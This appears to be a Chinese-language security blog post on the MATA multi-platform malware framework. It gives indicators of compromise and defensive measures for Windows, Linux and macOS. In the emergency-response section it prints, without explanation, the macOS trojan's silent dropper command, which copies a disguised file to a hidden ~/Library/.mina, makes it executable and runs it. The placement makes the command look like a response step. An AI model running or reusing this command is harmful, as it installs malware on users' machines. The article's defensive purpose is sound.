发现恶意软件框架MATA，可攻击多操作系统并含多种组件

MATA恶意软件框架的隐蔽攻击手法

处在日益复杂的 IT 和 OT 环境当中，网络攻击的手段还在连续不断地进行升级，近期被曝光的 MATA 恶意软件框架，它能够同时对 Windows、Linux、macOS 系统展开渗透，其采用的模块化设计致使传统防治系统很难进行抵挡，这个框架借助加载器来使 payload 解密，运用 WMI 进行远程执行，已经在全球好多家企业的网络里隐匿潜伏了。

攻击者运用AES加密技术去隐匿恶意组件，且借由注册表或者配置文件夹进行动态加载，举例来说，Windows版本借助wbem\WmiPrvSE.exe进程予以触发，Linux版本是伪装成系统服务，这般多平台的兼容性致使MATA成为企业安全方面的重大隐患。

如何识别Windows版本的入侵迹象

查找系统之中是不是有异常进程，这是找出MATA的关键步骤。于Windows设备之上，要着重留意C:\Windows\System32\wbem\WmiPrvSE.exe的异常调用记录。要是这个进程忽然加载未知模块，或许就表示加载器正在解密payload。

与此同时，应当对注册表的变动情况进行监控，尤其是针对在HKEY_CURRENT_USER\Software\Microsoft这个路径之下的加密数据。MATA的orchestrator组件会从这里去读取配置信息，要是发现了AES进行安全加密的二进制数据块，就必须马上启动应急响应流程。

Linux系统下的检测与防护策略

要重点排查Linux服务器里/var/run/init.pid文件存在的异常情况。Linux版本若是MATA会伪装成mountd进程，依靠检查/proc/%pid%/cmdline里面设置的内容到底是不是匹配"/flash/bin/mountd"来做识别。网络设备管理人员需要定期去验证系统进程具备的完整性。

布置文件完整性监控工具这件事建议在Linux系统来做，要特别留意$HOME/.memcache文件的改变情况，这个文件存有以AES加密的恶意配置，任何一项未经授权的更改都应该引发告警，与此同时要把不必要的Confluence服务端口关闭掉，以此来防备CVE - 2019 - 3396漏洞被利用。

macOS环境的特殊防御要点

请警惕，苹果设备用户会遭到伪装是开源应用的木马程序。MATA的macOS版本曾存活于MinaOTP认证工具里，借Library文件夹植入Mach-O可执行文件。建议仅从官方商店下载应用，还要定期检查/Library/Caches/com.apple.appstore.db的读写记录。

企业内部能够部署EDR方案来监控Mach-O文件的异常行径，着重留意plugin_socks这款插件的代理配置举动，因为该模块有可能创建起隐蔽的隧道用以向外传送数据，对于从事开发工作的Mac设备应当施行更为严格的沙箱隔离策略。

企业级网络的全方位监控方案

在核心交换机那儿建议去部署流量分析系统，以此对 MataNet 节点的 TLS 1.2 加密通信加以检测了。虽说流量运用的是 RC4 会话密钥来加密，不过通过行为分析却能够识别异常连接模式。把所有 HTTPS 服务器的外联请求都进行记录，还要与已知恶意域名库加以比对。

构建跨度涵盖多平台的日志聚合体系，把Windows当中的事件日志，Linux的审计日志，以及macOS的统一日志予以关联起来展开分析。设定告警准则：要是同一源IP在24小时的时长范围内试图进行三种截然不同系统类型的渗透举动，那么便会自动启动威胁狩猎的流程。

应急响应与持续加固措施

cp TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib ~/Library/.mina > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev/null 2>&1

一旦察觉到感染迹象，即刻对受影响设备实施隔离，优先去截取内存镜像用以取证。运用专业工具提取加载器的AES密钥，借着该密钥解密payload从而分析攻击者潜藏的意图。与网络安全机构取得联系，借助其协助清理持久化后门，尤其要留意注册表以及启动项里隐秘的条目。

需建立软件供应链审查机制以进行长期防护，尤其要针对开源工具的分发站点开展安全评估，定期组织红蓝对抗演练，模拟MATA的多阶段攻击过程，更新安全策略，规定所有跨平台服务采用硬件密钥实施双向认证。

当您的企业遭遇这类跨平台高级威胁之际，最薄弱的防护环节于哪个系统层面出现呢？欢迎在评论区讲讲您的观察，要是觉得本文有帮助那就请点赞予以支持！